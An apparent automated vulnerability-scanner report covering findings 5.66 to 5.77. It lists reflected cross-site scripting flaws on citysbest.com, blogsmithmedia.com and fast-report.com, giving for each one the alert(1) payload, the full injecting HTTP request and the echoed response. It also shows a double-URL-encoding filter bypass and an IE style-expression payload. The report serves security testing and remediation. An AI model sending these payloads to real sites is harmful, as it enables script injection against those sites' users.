Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17836
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "included8037</script><script>alert(1)</script>465808f0b34" : "national";

var isUrl2 = "citysbest-min.js";
s_265.prop2= isUrl2 != ''? "citysbest-min.js" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.pu
...[SNIP]...

5.66. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464e5"><script>alert(1)</script>58128cfd51f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include464e5"><script>alert(1)</script>58128cfd51f/citysbest-min.js?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17474
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include464e5"><script>alert(1)</script>58128cfd51f/citysbest-min.js?29"/>
...[SNIP]...

5.67. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31cbd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e77e4b54285b was submitted in the REST URL parameter 3. This input was echoed as 31cbd</script><script>alert(1)</script>77e4b54285b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/include/citysbest-min.js31cbd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e77e4b54285b?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17410
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "include" : "national";

var isUrl2 = "citysbest-min.js31cbd</script><script>alert(1)</script>77e4b54285b";
s_265.prop2= isUrl2 != ''? "citysbest-min.js31cbd</script>
...[SNIP]...

5.68. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdafe"><script>alert(1)</script>f56c1613a2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include/citysbest-min.jscdafe"><script>alert(1)</script>f56c1613a2b?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17196
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include/citysbest-min.jscdafe"><script>alert(1)</script>f56c1613a2b?29"/>
...[SNIP]...

5.69. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc64"><script>alert(1)</script>1a393b12c55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaacc64"><script>alert(1)</script>1a393b12c55/citysbest-min.css?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17455
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/mediaacc64"><script>alert(1)</script>1a393b12c55/citysbest-min.css?58"/>
...[SNIP]...

5.70. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ea01%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71724f793f was submitted in the REST URL parameter 1. This input was echoed as 3ea01</script><script>alert(1)</script>71724f793f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /media3ea01%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71724f793f/citysbest-min.css?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17806
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
265.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "media3ea01</script><script>alert(1)</script>71724f793f" : "national";

var isUrl2 = "citysbest-min.css";
s_265.prop2= isUrl2 != ''? "citysbest-min.css" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.
...[SNIP]...

5.71. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4250"><script>alert(1)</script>9381a402f46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/citysbest-min.cssf4250"><script>alert(1)</script>9381a402f46?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17178
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/media/citysbest-min.cssf4250"><script>alert(1)</script>9381a402f46?58"/>
...[SNIP]...

5.72. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af55b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29e0ad3a2 was submitted in the REST URL parameter 2. This input was echoed as af55b</script><script>alert(1)</script>e29e0ad3a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /media/citysbest-min.cssaf55b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29e0ad3a2?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:37 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17387
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "media" : "national";

var isUrl2 = "citysbest-min.cssaf55b</script><script>alert(1)</script>e29e0ad3a2";
s_265.prop2= isUrl2 != ''? "citysbest-min.cssaf55b</script>
...[SNIP]...

5.73. http://www.citysbest.com/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc31"><script>alert(1)</script>9a5275880b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trafficebc31"><script>alert(1)</script>9a5275880b0/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:59 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17745
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/trafficebc31"><script>alert(1)</script>9a5275880b0/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718"/>
...[SNIP]...

5.74. http://www.citysbest.com/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d03%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c9e0bcf83e was submitted in the REST URL parameter 1. This input was echoed as 55d03</script><script>alert(1)</script>9c9e0bcf83e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /traffic55d03%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c9e0bcf83e/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 18075
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "traffic55d03</script><script>alert(1)</script>9c9e0bcf83e" : "national";

var isUrl2 = "";
s_265.prop2= isUrl2 != ''? "" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchaseID=Math.ceil(Math.random()
...[SNIP]...

5.75. http://www.fast-report.com/bitrix/redirect.php [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect.php

Issue detail

The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3f0b1'style%3d'x%3aexpression(alert(1))'8b36f925f23 was submitted in the goto parameter. This input was echoed as 3f0b1'style='x:expression(alert(1))'8b36f925f23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bitrix/redirect.php?event1=shareit_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=3f0b1'style%3d'x%3aexpression(alert(1))'8b36f925f23 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A45

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:34:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 16:34:46 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:34:50 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A34%3A50; expires=Tue, 20-Mar-2012 16:34:50 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 38534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<input type='hidden' name='backurl' value='/bitrix/3f0b1'style='x:expression(alert(1))'8b36f925f23'>
...[SNIP]...

5.76. http://www.fast-report.com/bitrix/redirect2.php [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect2.php

Issue detail

The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e9fb"><script>alert(1)</script>ec45f26fc89 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GID%238e9fb"><script>alert(1)</script>ec45f26fc89 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:32:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:32:33 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A32%3A33; expires=Tue, 20-Mar-2012 16:32:33 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 406

<html><head><script language="JavaScript1.1" type="text/javascript">function rd(){b_form.submit();}</script></head><body onload="rd();"><form name="b_form" action="redirect3.php" method=get><input type=hidden name=GOTO value="https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1&GID=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4=8e9fb"><script>alert(1)</script>ec45f26fc89">
...[SNIP]...

5.77. http://www.fast-report.com/bitrix/redirect2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05f1"><script>alert(1)</script>c0e1758ffb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GI/c05f1"><script>alert(1)</script>c0e1758ffb3D%23 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:32:37 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:32:41 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A32%3A41; expires=Tue, 20-Mar-2012 16:32:41 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 376

<html><head><script language="JavaScript1.1" type="text/javascript">function rd(){b_form.submit();}</script></head><body onload="rd();"><form name="b_form" action="redirect3.php" method=get><input type=hidden name=GOTO value="https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1&GID=#EVENT_GI/c05f1"><script>alert(1)</script>c0e1758ffb3D#">
...[SNIP]...

